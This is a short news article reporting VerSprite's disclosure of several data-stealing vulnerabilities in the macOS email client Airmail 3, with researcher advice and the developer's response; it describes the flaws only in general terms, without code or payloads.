Airmail 3, a popular email client for macOS, ships with big security vulnerabilities that could put users’ personal data at risk.
Researchers uncovered an exploit that allows attackers to steal users’ emails and attachments simply by convincing them to open a message. Here’s how it works.
Airmail 3 promises fast performance and “intuitive interaction.” It comes loaded with features, sports an attractive design, and supports all major email services. It’s no wonder Airmail 3 became so popular among macOS users.
But there’s something you should know before you rush off to download it.
Beware the Airmail 3 vulnerability
VerSprite researchers have discovered flaws in the way Airmail 3 handles URL requests, which attackers could use to steal personal data.
By sending a message with a specific URL request — one that secretly uses the “send mail” function of Airmail 3 — attackers can obtain a user’s emails and attachments before they have any idea what’s happening.
Other code could be embedded that instructs Airmail to attach other files to the outbound email, the researchers warn.
Another vulnerability allows attackers to request specific documents from the user account database. Hackers could use a third Airmail vulnerability to bypass HTML filters, preventing included plugins from being identified as malicious.
A fourth allows attacks to take place as soon as a user opens an email. It does not require the user to click on a link within the email. This exploited only worked half the time, according to researchers.
iOS users may be at risk
The researchers discovered these flaws in the macOS version of Airmail 3. It’s not clear if similar problems exist in the iOS version. VerSprite reported them all to Airmail’s developers. However, the researchers say no patches have been issued.
“I would avoid using Airmail 3 until this is fixed,” advises VerSprite researcher Fabius Watson.
Airmail told AppleInsider that an update to address these problems will arrive “probably today.” The developer also calls the potential attacks “very hypothetical” and insists no users have been affected.